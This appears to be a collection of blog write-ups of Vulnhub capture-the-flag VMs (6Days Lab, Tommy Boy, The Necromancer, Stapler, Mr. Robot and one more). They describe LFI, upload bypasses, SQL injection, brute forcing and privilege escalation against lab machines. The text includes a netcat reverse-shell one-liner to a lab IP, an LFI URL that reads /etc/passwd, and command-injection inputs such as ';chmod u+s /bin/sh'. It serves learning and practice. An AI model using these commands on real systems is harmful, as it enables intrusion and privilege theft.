Basically, the php://input wrapper will allow you to read raw POST data by allowing you to add filters combined with functions such as readfile(). In this instance, the server will let you read certain resource files, echoing the contents back you base64 encoded. Sweet!

Well, I knew the config.php file existed but I was not yet able to read it so may as well go for the gold first. Throwing the request to Burp repeater got me my first bit of data.

 

Decoding the stream I was presented with credentials for the MySQL instance.

 

I also took the time to read the upload.php page.

 

The source of the upload.php page was particularly interesting. I could see that any uploaded document had to pass 3 checks before being accepted 1) it had to have a .jpg, .jpeg, .gif or .png extension 2) the mime type had to match one of the four extension and 3) it could not have multiple file extensions.

Logging in with the MySQL credentials I was presented with a database named ‘User’s with 3 entries with base64 encoded passwords.

The user table

Heading back over to the web application I was able to log in with one of the users and was presented with a simple upload form.

I needed to upload some PHP code (preferably a reverse shell) but trick the server into thinking I uploaded a valid gif file. Just putting the ‘GIF’ header in before the PHP started did the trick.

Now I needed a way to execute the PHP with in the “gif” image file. Looking back at what I had I pulled up the source of the index.php page. This page shows that the “lang” parameter gets set as a cookie. Perhaps this could be used to run our PHP code?

After some considering flopping around the following ran for me and gave a hit on my listener.

Once in, I turned to g0tmi1k’s handy privilege escalation guide (https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) and starting enumerating the file system.  After a while I turned up a SUID binary owned by the user Mike. Great, my favorite.

The binary file was tiny so I did not expect too much was going on. Running it gets me a “permission denied” for trying to cat out a file in Mike’s home directory.

Loading up my trusty demo version of IDA confirmed that nothing more was going on.

Now, the binary was meant to call ‘cat’ but not with the absolute path so I could not use a symlink. I know that you can abuse a user’s PATH variable (http://www.dankalia.com/tutor/01005/0100501004.htm), but how could the 2 be combined? Since the binary runs as Mike I figured that this was not the path to obtain root but just the first step in privilege escalation. I moved over to the /tmp directory, created a file named ‘cat’ with /bin/sh as the contents and modified it to be executable.

Now, if I just ran the ‘cat’ command it would run /bin/sh. Cool. The next step was running the binary to call my fake ‘cat’ binary. Changing my path to just “.” meant that if I would be able to run the msgmike binary by just typing out the absolute path (/home/kane/msgmike). Doing this spawned a shell as Mike and after fixing up my path I was in as this user and ready for the next step.

Oh hey, another binary! This one didn’t need much of a look. As the previous one I can see it is just running one command, dropping the user into a prompt ‘Message for root:’ and then echoing out the user-supplied message to /root/messages.txt

Never trust user-supplied input! This one has command injection all over it. If we type a ; after the ‘Message for root:’ prompt we can redirect output to the command of our choice. I run it first with ‘;id’ and it shows the EUID for root.

To become root, not very stealthy as it involves a change to the file system (which we would not typically want to do in a production environment) we can append the command ‘;chmod u+s /bin/sh’.

I was fully expecting another binary challenge to grab the flag, but alas it was just a text file.

Shout-out to @chronicoder for putting together an awesome challenge. Looking forward to the next one.

Thanks goes to @g0tmi1k and the vulnhub team for keeping these resources flowing.

Vulnhub has been raining VMs lately, a good mix of challenges which keep me on my toes constantly. 6Days lab was an enjoyable VM with a unique twist which had me pulling my hair out late at night.

You can grab the VM here: https://www.vulnhub.com/entry/6days-lab-11,156/

Let’s go!

As always, I started off with an nmap scan. Standard ports 22 and 80 open with a proxy service on port 8080.

Browsing to the web application I was greeted with a page touting the new Rashomon IPS service which would prove to be the bane of my existence for a few days.

Browsing around I noticed the ‘src’ parameter on the image.php page which is attempting to call an image from an external site. I first thought RFI but no, it could not be that easy. Firing up Burp I passed the request to repeater and saw that we were working with an LFI.

I started off by checking out the source of each of the PHP pages I knew existed.

Checkpromo.php was clearly vulnerable to SQL injection on the ‘promocode’ parameter, but we know there is an IDS in place. More on that later.

The index.php and image.php pages were not particularly exciting. Config.php gave me a glimmer of hope but, aside from the dbname, the credentials were not useful.

From the /etc/passwd file I knew that we had 2 users on the system “user” and “andrea”. Andrea’s shell was set to /bin/andrea. Using our LFI I had a look at this shell script. The readme for the VM mentions sandbox escapes so here is our “sandbox”. Andrea’s shell is set to rbash and all command input is directed to /dev/null, meaning that she can likely run most commands but even if they are successful there will be no feedback on the screen, evil 🙂 .

Back to the web app, we know we are likely dealing with some sort of SQL injection. Flopping around for some time I realized that we can evade the IPS utilizing SSRF to call the checkpromo.php page directly and that we are dealing with a time-based blind SQLi. SQLmap confirmed a time-based blind SQLi for the ‘promocode’ parameter. This was confirmed after attempting all upper and lowercase characters and receiving a 5 second delayed response on “S”, meaning that a password likely started with an “S”. All initial attempts with SQLmap and tamper scripts would not return any data. This was likely due to the size of the payloads being used as well as the proxy.

 

At this point we needed to be able to exploit the SSRF + SQLi with SQLmap (time-based blind SQLi by hand is something I need to work on).

With Burp to the rescue, we are able to set up a match/replace rule to automatically call the vulnerable URL via SSRF.

Chatting with @GKNSB for quite some time we realized that double URL encoding was needed, but only for certain special characters. While I tried to achieve this with some crazy Burp rules (unsuccessfully) @GKNSB whipped up this awesome custom SQLmap tamper script which worked flawlessly.

Armed with this tamper script and knowledge of the database name I was quickly able to pull out Andrea’s password.

And our password.

Armed with the goods I was able to SSH in, directly into the rbash shell 🙂 .

There are other ways to do this but I just took the opportunity to throw myself another shell as www-data to be able to look around the file system freely.

There was a custom binary ‘dog’ in Andrea’s home directory.

I pulled it down with netcat and had a look.

I was not able to fully exploit it as reversing is an area that I am still working on but did find that the dog file expected to be fed a file owned by a user with UID 1001 and would print the contents, otherwise an “Access Denied” message is printed (with some assistance and prodding from @sizzop who always keeps me on my toes).

Main makes a call to stat() (which checks the status of a file, including UID, dates, owner, etc.). When calling stat main checks 2 fields back to back to make sure they are both ‘3E9H”. Highlighting and pressing the ‘H’ key in IDA converts the hex to ‘1001’, confirming that the call to stat() is checking for a file with the UID and GUID 1001:1001 and if the file is owned by that user is will print out “Access Granted” and make a call to readfile() which prints the contents of the file.

To test this I created a test file owned by a user locally with UID and GUID 1001.

Running the dog binary against this confirmed what we have found.

At this point I went back to the VM, thinking that this binary would be useful in reading a file such as /etc/shadow. This did not work which made me think there is a missing piece in using this binary for privilege escalation that I will have to dig into further. I was able to obtain root privileges using a kernel exploit, which is my least favorite method but still got the job done.

And we have our flag.

Shout-out to @1ce7ea for an awesome challenge, @GKNSB for the tamper script which saved me lots of pain, @sizzop for another quick lesson in reversing, and @g0tmi1k for continuing to keep the vulnhub community going.

I saw @7minsec discussing testing going on for his upcoming Tommy Boy VM a few weeks back. I was eagerly awaiting the release of this one as Tommy Boy was a classic movie from my childhood and any VM involving Chris Farley would have to be full of trolls…I was right.

You can grab the VM here: https://www.vulnhub.com/entry/tommy-boy-1,157/

Note from the author:

The primary objective is to restore a backup copy of the homepage to Callahan Auto’s server. However, to consider the box fully pwned, you’ll need to collect 5 flags strewn about the system, and use the data inside them to unlock one final message.

Let’s go!

Started off with an nmap scan of all ports which returned SSH and 2 Apache servers, one running on a non-standard port.

Browsing to port 80 to start I was greeted with the Callahan Auto page which apparently was experiencing some technical difficulties.

A look at the page source provided me my first introduction to Nick Burns as well as some hints.

 

 

I also started compiling a list of possible usernames for later.

I also grabbed flag 1!

I pulled down all the image files and checked them with exiftool for any hidden treasures but came up short.

AHH! Where to now? Oh yeah, the YouTube link in the page source.

Prehistoricforest seemed like a good candidate for our hidden directory…and we’re in! I was greeted by the Callahan Employee Blog on WordPress with 1 protected post and various other posts strewn about.

While here I stopped to grab the second flag.

 

This Nick Burns character was great, hurling insults while trolling me. Nice touch by the author.

I browsed to the /richard directory and was greeted with an image. This time a look with exiftool gave me a clue.

I threw the md5 hash into md5cracker and got a quick result: spanky.

Heading back to the blog I was able to use this password to access the protected post and was greeted with a wealth of information and lots of snark from Nick Burns.

 

At this point I was able to surmise that down the road I would be able to SSH in as Big Tom (username to be determined) and that an FTP server was running on a non-standard port which opened for 15 minutes at the top of the hour and then went down for 15. Nice troll by the author.

I had to wait a bit for the top of the hour and then fired off another nmap scan which showed that port 65534 was now open 🙂

I confirmed it was indeed the Callahan FTP Server.

I tried various brute force attacks but nothing was working, also the port kept going down for me. I slapped together a quick script to monitor the port while I poked around the web server some more.

After a while my little script told me to get back to the FTP.

Since Nick Burns seemed to be an abysmal IT admin I took a guess that he may re-use his username as his password. Trying nickburns:nickburns granted me access!

There was on file accessible and I was restricted to the FTP root directory. Taking a look at the readme I was presented with some additional clues.

I hunted for this directory for a while on port 80 then remembered the nmap scan. For some reason I had seen 8080 earlier, tried that and when it did not connect I gave up. Browsing to I was greeted with another nice message from Nick and a reference to Steve Jobs.

This one threw me for a bit but I remembered that Burp has the ability to change your user-agent (you can do this within the browser as well). However, I have used this particular feature before on client assessments to replace my user-agent with different payloads in attempt to inject JavaScript into any logs that may be available on an admin portion of the application (so far it has worked once in the last year 🙂 ).

Well I passed the dummy test! But Nick Burns is not a gracious man.

So I needed the find a certain .html file using the iOS user-agent from earlier. Dirbuster can do this!

I set up dirbuster with the rockyou.txt wordlist and let it rip.

After a bit I was thrown a result: fallon1.html.

Browsing to this page I was given a hint, the third flag and a password protected zip.

Oh hey flag 3!

The hint broke down for us how Nick Burns chose the password for his password vault.

Based on the specific parameters given another built in Kali tool, Crunch, can help us  generate a custom word list for brute forcing.

I laughed when I saw 58 million combinations.

Our tool of choice for brute forcing a password protected zip is fcrackzip. I fired this up with our new 58 million strong word list and waited and hoped for a hit.

After a while I got what I came for.

I opened up the zip file and was greeted with more clues and trolls.

This next part through me for a loop for a while. I had to get into the wp-admin portal to continue.

The clue was a Queen song. I checked the Tommy Boy soundtrack and there were no Queen songs in the movie. I made several wordlists, one using the names of the top 30 Queen songs on google and mangling them up with l33t rulesets. Nothing. I then used Cewl to create a massive word list using the lyrics from a few well known songs. All these lists against the wp-admin page with my 4 users (tom, richard, tommy, michelle) got me nothing.

I grabbed a couple beers and thought some more on this. Stumped I gave one last effort with rockyou.txt. It had worked earlier so why not.

Firing up WPScan and I had my result quickly.

Thinking back now the clue was right in front of me (We Will Rock You was the Queen song). Great troll and props to the author. Sometimes we don’t notice what is right in front of us 🙂

I signed in to the company blog and found a post in the “drafts” folder.

 

This draft post gave me what I needed to complete Big Tom’s password and (hopefully) get in via SSH.

bigtommysenior:fatguyinalittlecoat1938!! and we’re in!

Scooped up flag 4.

Remembering back from the initial instructions I knew I had to restore the backup of the website.

First task accomplished!

Looking around the file system a bit I found what I believed to be flag 5. But the odd part was that it was owned by www-data and not readable. Ugh!

Looking around the file system some more I found some world writeable directories including one very interesting one.

My first attempt to upload a .php file was rejected so I changed the file name to upload an image file.

This one was accepted!

Since I had access to the server I was able to just rename the .jpg file to a PHP file and get a reverse shell as www-data user.

I proceeded to grab flag 5 and was greeted with one last task.

I threw together all of the flags into the following string and was able to unzip the LOOT.zip file.

Here comes the meat wagon!

Awesome first VM by @7minsec. I always enjoy the VMs that follow a story and keep you on a set path. This one was lighthearted, fun and had the right mix of trolls and some quick wins to keep you motivated. A great addition to Vulnhub and I look forward to the sequel!

Shout-out to @g0tm1lk as always for continuing to maintain this great learning community.

-mrb3n

New images have been popping up on vulnhub.com left and right, I can hardly keep up. When I saw the latest, The Necromancer by @xerubus, I knew by the title I had to give this one a shot. The description stated that this was more of a CTF type box with 11 total flag.

Download link: https://download.vulnhub.com/necromancer/necromancer.ova

Part way through this one I linked up with @cmaddalena and we commiserated and bounced ideas off each other. We were both stuck at flag 4 for quite some time.

Let’s go!

This one started off like any other, imported the image, booted it up and kicked off an nmap scan once I grabbed its IP. Except, the first scan did not return any open ports, either did the second, or the third. OK, something was blocking/trolling me. I toyed with various scans and only once I threw UDP in the mix did I receive any type of result.

I connected to port 666 and received the message ‘You Gasp for air! Time is running out!’

I toyed with this for a while, even crashing the service and having to restart the VM…not the first time.

Flag 1

I decided to move on for now and fired up Wireshark and noticed that the VM was making ARP requests out to every IP in the subnet, internet. Perhaps, some ARP poisoning? I opened up ettercap to get a better view and could see the machine was calling out to port 4444 on every machine in the subnet. I started up a listener and received my first sign of life.

Hmm, a huge base64 encoded string. I grabbed it, decoded it an was presented with the following message and my first flag!

Welcome!

You find yourself staring towards the horizon, with nothing but silence surrounding you.
You look east, then south, then west, all you can see is a great wasteland of nothingness.

Turning to your north you notice a small flicker of light in the distance.
You walk north towards the flicker of light, only to be stopped by some type of invisible barrier.

The air around you begins to get thicker, and your heart begins to beat against your chest.
You turn to your left.. then to your right!  You are trapped!

You fumble through your pockets.. nothing!
You look down and see you are standing in sand.
Dropping to your knees you begin to dig frantically.

As you dig you notice the barrier extends underground!
Frantically you keep digging and digging until your nails suddenly catch on an object.

You dig further and discover a small wooden box.
flag1{e6078b9b1aac915d11b9fd59791030bf} is engraved on the lid.

You open the box, and find a parchment with the following written on it. “Chant the string of flag1 – u666”

The MD5 decrypted to ‘opensesame’.

Flag 2

I had already thrown various things at port 666 so I ventured a guess with the string from flag 1, and got my 2nd flag!

Flag 3

Based on the information in flag 2, I surmised that port 80 had opened. Visiting it I was presented with the following page:

I checked the page source, nothing, fired off Burp to spider the app and pulled down the image file. Checking the exif data returned nothing useful. Running strings on the file got me the following info, which told me there was likely a ‘feathers.txt’ file embedded within the image.

I could have used Foremost or Binwalk here too but for some decided to convert it to a zip file and unzip it, it worked!

Once I decoded the base64 I was rewarded with flag 3 and another URL, time to cross the chasm.

Flag 4

Oh flag 4, how you haunted me. I spent way too long on this, way, way too long. Finally, after a hint from the author Xerubus that I was looking for something at this URL, I made a custom word list from all the ‘magic items’ I could find out on Google related to necromancers, necromancy and sorcerers. Two of the sites I grabbed info from with Cewl were: http://www.tribality.com/2015/11/02/dd-5e-magic-item-guide/ and http://www.d20srd.org/indexes/magicItems.htm

Running Cewl to create the Wordlist

I set this up in Burp Intruder since Dirbuster was giving me schedule results and timing out often.

A snippet of some of the requests, all resulting in ‘404’ statuses. I didn’t bother to clean up the word list so there was a lot of junk in there.

Eventually I got a hit on ‘talisman’

The file itself was a binary. At first I was disappointed. Binary exploitation is an area that I am still quite weak in, but I need to practice on. After fumbling around for a number of hours I noticed 2 functions ‘wearTalisman’ and ‘chantToBreakSpell’. I spun my wheels for a bit and reached out to @sizzop who is a binary wizard. He threw me a few ideas and some light reading on gdb. After some more fumbling I was successful in setting a breakpoint at the ‘wearTalisman’ function (since this function did not actually reference the ‘chantToBreakSpell’ function and was not going to give me anything no matter how much I begged). Once this was done I ran the program again and, once it hit the breakpoint I set earlier, I directed it to jump directly to the ‘chantToBreakSpell’ function. Here I was greeted with flag 4 and my next clue.

This made me realize that I need to finally go back and work through as many of the binary challenges as I can stomach. It’s all about being well-rounded.

Flag 5

The MD5 from flag 4 decrypted to ‘blackmagic’. I fed this to UDP port 31337 and got my next flag! And another clue.

Flag 6

Browsing to the URL from flag 5 I was greeted with a friendly Necromancer as well as flag 6. Things were starting to heat up.

I was also presented with a download link that turned out to contain a pcap (Wireshark packet capture) file as well as a our next clue, UDP port 161. SNMP?

Flag 7

I loaded the pcap up in Wireshark and was presented with WPA encrypted wireless traffic, interesting. Wireless is another area that I don’t have much experience in.

Google led me to an article about cracking WPA passphrases with aircrack-ng. I set everything up, and fired rockyou.txt at the file.

I had a result, ‘death2all’, relatively quickly.

Next I followed a similar method that I have used to decrypt SSL with a private key, but this time to decrypt the wireless traffic.

I poured over the pcap for a while and nothing really jumped out to me except for the SSID name ‘community’. Perhaps this was a hint to look further into SNMP which was referenced on the webpage from flag 6?

I did a bit of reading as a refresher on SNMP (http://cuddletech.com/articles/snmp/node13.html) and tried my lock with snmpwalk, using ‘death2all’ as the community string.

I was presented with some very promising results and headed back to Google.

“The door is Locked. If you choose to defeat me, the door must be Unlocked.” After some light reading (http://net-snmp.sourceforge.net/wiki/index.php/TUT:snmpset) I determined that I could likely edit the string values. I gave it a shot with snmpsnet, first trying “The door is Unlocked” but did not receive a positive result. Interpreting the earlier message literally I set the string to just ‘Unlocked’ and was rewarded with flag 7 and my next hint. TCP port 22. Time to SSH in and face the Necromancer?

This part was really well done and a unique twist from any of the CTFs I’ve done.

Flag 8

The MD5 from flag 7 decrypted to ‘demonslayer’. I confirmed that port 22 was open and proceeded to try a bunch of combinations of logins with ‘demonslayer’ set as both the username and the password.

Once I realized I was getting nowhere fast I decided to give brute forcing a try with Hydra. Logically, ‘demonslayer’ was likely the username so I combined that username with the rockyou.txt wordlist and had a result pretty quickly.

Logging in as ‘demonslayer’ I was presented with a smiling face. The Necromancer! At last we meet!

Once logged in I had to contain myself and remember this was meant to be a CTF, not necessarily a challenge to get root. I had to find the next flag. Checking demonslayer’s home directory I had my prize and another clue, time to meet the Necromancer face-to-face on UDP port 777.

I first tried to connect remotely, but that didn’t make sense. I was in the Necromancer’s lair after all. I had to fight him there.

Connecting to port 777 locally started the final phase. A notice appeared that I had 3 hitpoints, in this case meaning that after 3 incorrect answers my connection was dropped and I had to re-do the entire scenario to get back to this point. Good thing I had good notes and this only happened once.

For flag 8 I went out to wikipedia (https://en.wikipedia.org/wiki/Tsurani)

Flag 9

I was not familiar with any of these references so I turned to Google once again, the following link got me my answer for flag 9: http://www.liquisearch.com/spirit_of_fire/supporting_characters/johann_faust_viii

Flag 10

At this point I was sweating profusely (I’ll blame the Florida heat) and exhausted. However, the end was in sight and there was no way I was giving up without my prize.

Thank you Google (https://en.wikipedia.org/wiki/List_of_Old_Kingdom_characters) and, flag 10!

Flag 11

I flopped around for a while, then, looking at the problem logically again, checked for hidden files.

Once again I was stuck, due to brain meltdown I had no idea what this final clue was. Had I come this far to not get the final flag? I enumerated the entire file system looking for the flag and eventually came back and re-read the clue. “Great power in your veins”… as in root power? I tried to su to root with demonslayer’s password and was denied. Sigh. Surely this clue meant something, perhaps I could run something as root? Yes I could!

Demonslayer could cat out the final flag hidden in root’s home directory.

The Necromancer was slayed. Wow, what a great feeling. I always enjoy vulnhub challenges but completing this one was a special feeling. This CTF pushed and pulled me in all directions, made me step outside of my comfort zone, showed me where my deficiencies are all while being a ton of fun.

Props to @xerubus for creating this unique and interesting challenge.

As always thanks to @g0tmi1k for maintaining vulnhub as well as everyone in the vulnhub community for continuing to produce these valuable teaching tools.

Until next time!

I decided to take a break from working on the Breach series, partially from burnout and partially due a lack of ideas for finalizing part 3. I took the opportunity to work through g0tmi1k’s Stapler that he put together for the BsidesLondon 2016 Vulnhub workshop. Below I’ll go through 5 ways to achieve a local shell (some dirty/cheap shots but I figured I’d write them up regardless) and 3 separate ways to escalate to root.

You can grab the files here: https://download.vulnhub.com/stapler/Stapler.zip

I. Discovery

I imported the VM and grabbed the IP using netdiscover (you’ll notice I switch to 192.168.110.157 later on as I forgot to set the HDD to non-persisent and rendered the VM, well, unresponsive).

I followed up with an nmap scan and uncovered some interesting services. A full port scan gave me some issues so I ran the top 1000, then top 5000 before digging in.

I also performed a UDP scan and found a few more interesting services (more on that later).

I started by checking the FTP and SSH services. I was able to log in anonymously to the FTP. Along the way I grabbed the banners and a note file.

At this point I started a user list as it appeared that the users Harry, Elly, Barry and John may be valid users on either a web app or the system itself.

Port 80 gave me a ‘Not Found’ error and subsequent enumeration with Burp and dirbuster did not uncover any usable pages.

Following up on port 139, I ran enum4linux which came in handy often in the Offsec PWK labs.

The results are truncated here but I found some shares (including 2 more possible usernames Kathy and Fred).

…and what I was looking for, a full listing of local users.

I fumbled around for a bit, checking for anything useful on port 80 and attempted to authenticate remotely via MySQL without success. I checked out port 12380 via the web browser and found some sort of web app running. The page source had a comment which I saved for later, again confirming another possible user.

I ran Burp and Nikto against port 12380 and received inconclusive results showing a robots.txt file with entries for ‘blogblog’, ‘admin112233’, and ‘phpMyAdmin’. The Nikto results gave me another clue “the site uses SSL…”

Changing over to https I finally had something useful to work with.

Oh hey, a WordPress blog 🙂

I fired up WPscan and enumerated a bunch of usernames (some which I had gathered earlier).

Based on the listing john appeared to be the site admin so I went to work brute forcing his password and grabbed a beer (or 3).

It took a bit but rockyou.txt found the password – john:incorrect.

I attempted to replace the 404.php template with a PHP reverse shell off the bat but was unable to edit the themes. I flopped around for a bit and decided to go check out the Samba shares.

Using John’s password I checked out the ‘tmp’ and ‘kathy’ shares.

The shares held some notes and a WordPress backup. I grabbed the WordPress backup to check for anything useful in the config but it appeared to be a backup of the stock configuration, not the actual site.

II. Exploitation (Local access)

I will go through 5 ways to achieve local access. Some are not purely independent of other issues and some are a bit “dirty” but we’re all about learning here.

1) PHP reverse shell upload via WordPress plugin upload page.

The file upload function on WordPress would not accept PHP or any bypasses that I attempted so I gave the plugin upload a shot. Since directory listing was enabled on /wp-content/uploads I was able to check if my attempts were successful.

2) Shell upload via TFTP over UDP.

I noticed a tftp service running on UDP port 69 early on and attempted an uploaded. You cannot perform a directory listing, but turning on verbose mode it appeared that my upload was successful and perhaps had uploaded directly to the web root on port 80?

I fired up a listener, browsed to where I thought the file was uploaded and got a connection back, nice!

3) SSH Brute Force

Brute forcing is not stealthy and could result in account lockout in the real world. We don’t have to worry about that here so here goes. I made a wordlist of all the user names I had gathered so far and first tried with rockyou.txt. It ran for a while and didn’t uncover anything so I gave it another shot re-using the usernames as passwords. After a bit I got a hit on SHayslett.

4) WordPress Advanced Video Plugin Local File Inclusion (LFI) + Shell via MySQL Remote Authentication

The Advanced Video Plugin is vulnerable to an LFI vulnerability which can be used to read files on the local file system.

There is a exploit on exploit-db which must be fixed up to run properly: https://www.exploit-db.com/exploits/39646. The exploit does not require an authenticated admin session, doh!, and will read the contents of a local file and save the file as a .jpeg image to the /wp-content/uploads directory. The POC goes after the wp-config.php file. More on that. I first grabbed the /etc/passwd file to confirm it worked.

https://192.168.110.157:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=123&short=1&term=1&thumb=../../../../../etc/passwd

I then got greedy and went after /etc/shadow and was denied.

I also attempted to read /var/log/access.log and /log/auth.log in an attempt to leverage to LFI to perform Apache log poisoning and get a web shell but was denied access to these files as well. I spent a while trying to grab files down until I remembered the POC and went after the wp-config.php file.

Now we’re getting somewhere, MySQL DB root credentials.

I was able to access the MySQL instance remotely and spent a long time enumerating the database. After spinning my wheels reading DB tables I decided to try writing out a small PHP web shell using dumpfile. I had grabbed a user listing but that’s about it.

I knew the /wp-content/uploads directory was writeable and with previous SSH access confirmed that the webroot was changed to /var/www/https (I wish I could say I guessed that).

I started up another listener and got a connection back! Careful with those WordPress plugins (I say this as I write this on a WordPress blog).

5) phpMyAdmin Direct Database Access

Using the credentials from part 4 I was able to access the phpMyAdmin console. Access did depend on the info gathered from the LFI but was independent of the MySQL instance allowing remote connections. Following a similar method, I wrote out a web shell.

Browsing to the file, as with part 4, I did not get any feedback from running commands such as /phpmyadmin_shell.php?cmd=whoami however I was able to obtain a reverse shell connection using mknod

mknod /tmp/backpipe p; nc 192.168.110.129 8444 0/tmp/backpipe

III. Privilege Escalation

I found 3 ways to escalate privileges and 1 nice troll which had me spinning my wheels for a while (thanks g0tmi1k!!).

1) Sudo group membership

After obtaining local access, I began enumerating the file system. I noticed that root was running a Python simple HTTP server from /home/JKanode so I went over to check out what else may be hiding in this directory. There was nothing there but the user to forget to clear their bash history before logging out.

Using these credentials I decided to login via SSH directly with ‘JKanode’ and ‘Peter’. Logging in with JKanode first I enumerated the file system for a long time (more to come on that). Logging in with ‘Peter’ gave me my first win. Peter in the sudo group! Entering the command ‘sudo -i’ I was able to gain root privileges.

2) Linux Kernel 4.4.x (Ubuntu 16.04) – double-fdput() in bpf(BPF_PROG_LOAD) Local Root Exploit

This particular kernel version appeared to be vulnerable to the following kernel exploit: https://www.exploit-db.com/exploits/39772/

I pulled the file over, unzipped, compiled and it ran out of the box.

A quick and easy way to root, though not my favorite as it is basically point and click.

3) World Writeable Cron Script Owned by Root

The final method is by abusing the cron-logrotate.sh script. It was set to run every few minutes (I believe, I forgot to check the frequency).

I logged in via SSH as SHayslett, echo’d a mknod reverse shell to the cron-logrotate.sh script, set up a listener and went chasing trolls.

I checked back a bit later and had a connection back as root. Awesome!

IV. Trolls

There were many notes and comments scattered out throughout the file system (SSH banner, FTP banner, Samba config, various files) that kept me chasing down leads that didn’t amount to anything.

One troll that had me running around for a while was what was running on port 666. It turned out to be a small shell script running from /usr/local/src. The script itself just served up the file ‘nc.zip’ upon successful connection. The zip file contains an image, which has 2 MD5 hashes in the exif data with a comment: “If you are reading this, you should get a cookie!” Haha, thanks guys.

The image was itself was just a screenshot of the nc.txt file within the same directory.

And the hashes

V. Closing

Overall this VM was a lot of fun. It had a little bit of something for everyone and plenty of clues built in that had me running in all directions. I hope this guide is useful for anyone starting out. Due to the length of the post I kept some of the explanations brief, a screenshot speaks a thousand words (sometimes). If you have questions on anything leave a comment or hit me up on Twitter or Freenode in #vulnub or #offsec.

Thanks to g0tmi1k for putting this together and as always for maintaining vulnhub which servers as a great educational tool for many.

Download location: https://download.vulnhub.com/mrrobot/mrRobot.ova

Goal: Find 3 keys hidden in different locations

The VM loaded up without an issue and grabbed an IP from DHCP.

I started off with a quick nmap scan, which showed both port 80 and 443 open.

Browsing to both I was greeted with an interactive page which seems to be a clone of https://www.whoismrrobot.com. Really cool added effects.

I went through each of the prompts to make sure there was no command injection before firing up Burp and browsing around/spidering.

The robots.txt file presented me with a dictionary file (perhaps alluding to some sort of brute-forcing_ as well as a key file containing an MD5 hash).

I saved both files down locally and my initial thoughts were confirmed, a custom dictionary file with over 850K lines.

I also had the first of the 3 keys mentioned in the readme. 1 down, 2 to go!

Some more poking around with Burp and I came across a WordPress login page. Since SSH was not enabled this seemed to be a good candidate for brute forcing.

When the default ‘admin’ username came back as invalid, I was able to guess the user thanks to WordPress’ convenient built-in username enumeration.

Below is the result for ‘admin’ as the username, showing “ERROR: Invalid username”:

Conversely, when I tried ‘elliot’ I was greeted with “ERROR: The password you entered for the username Elliot is incorrect”. Awesome, half way there!

I decided to run WPScan to both search for any WordPress misconfigurations and/or vulnerable plugins as well for its brute forcing function. I kicked off the scan with the username ‘elliot’ and the ‘fsocity.dic’ dictionary as the wordlist. While that ran, I kept poking around the site.

I didn’t find much else, aside from some trolls hanging around. Several references to the show.

A few hours later (3 hours 30 minutes 48 seconds to be exact)… I was presented with a positive result which I am glad I did not wait around for.

In retrospect, had I looked at the dictionary file more closely (doh) I would have noticed it is mostly duplicates (nice troll Jason!).  Sorting and removing the duplicates leaves us with a very few entries.

The password was Elliot’s employee ID number from the show. Once logged in I poked around the admin console for a bit and did not turn up anything of note.

A quick win when you have direct access to a WordPress admin console is to replace one of the theme templates with some PHP of your own. I decided to try for a reverse shell by editing the 404.php theme and replacing the contents with the PHP reverse shell from Pentest Monkey.

Browsing to http://192.168.110.153/wp-content/themes/twentytwelve/404.php gave me a hit on my listener. And we’re in!

Checking around the file system a bit I could see there was another user named ‘robot’. This user’s home directory held the second key file which I could not read…yet.

I was also presented with the MD5 of the user’s password, which I could read.

I threw the MD5 into John and got a quick result.

Using this password I was able to su to the user ‘robot’ and form here I was able to read the second key file.

2 down! 1 to go.

Digging around the file system as ‘robot’ I could see an FTP client running on local host which could possibly be leveraged as another route. However, I focused my attention on old version of nmap owned by root with the SUID bit set. Using the “–interactive” switch I was able to run commands as root.

Using this method I was able to grab the third key file.

I first attempted to throw myself a reverse shell with netcat however even though I could run commands as root the reverse shell still connected back in the context of the user ‘robot’.

I went for broke and added the user ‘robot’ to the sudoers.

Now that worked!

Now I was root and dug around a bit to see what was going on with the nmap interactive shell.

This was a fun VM and a welcome break from other things. Thanks to the author, Jason, for putting it together and as always thanks to g0tmi1k and the #vulnhub team for hosting and keeping this awesome community going. Looking forward to the next one!

Key locations:

Key #	Location	MD5
1	Web root	073403c8a58a1f80d943455fb30724b9
2	Robot’s home directory	822c73956184f694993bede3eb39f959
3	Root’s home directory	04787ddef27c3dee1ee161b21670b4e4